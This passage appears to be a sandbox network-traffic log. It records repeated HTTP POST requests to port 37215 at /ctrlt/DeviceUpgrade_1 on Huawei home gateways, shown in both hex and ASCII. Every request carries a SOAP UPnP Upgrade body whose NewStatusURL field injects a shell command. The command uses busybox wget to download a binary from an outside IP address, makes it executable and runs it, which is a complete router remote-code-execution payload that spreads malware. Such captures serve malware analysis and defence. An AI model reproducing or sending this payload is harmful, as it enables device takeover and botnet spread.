20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:09.610029936 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:15.753871918 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:27.785363913 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:52.616193056 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      5192.168.2.1434632197.16.39.8737215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:03.609898090 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:04.298249960 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:05.098222017 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:06.666120052 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:09.865901947 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:16.265677929 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:28.809170008 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 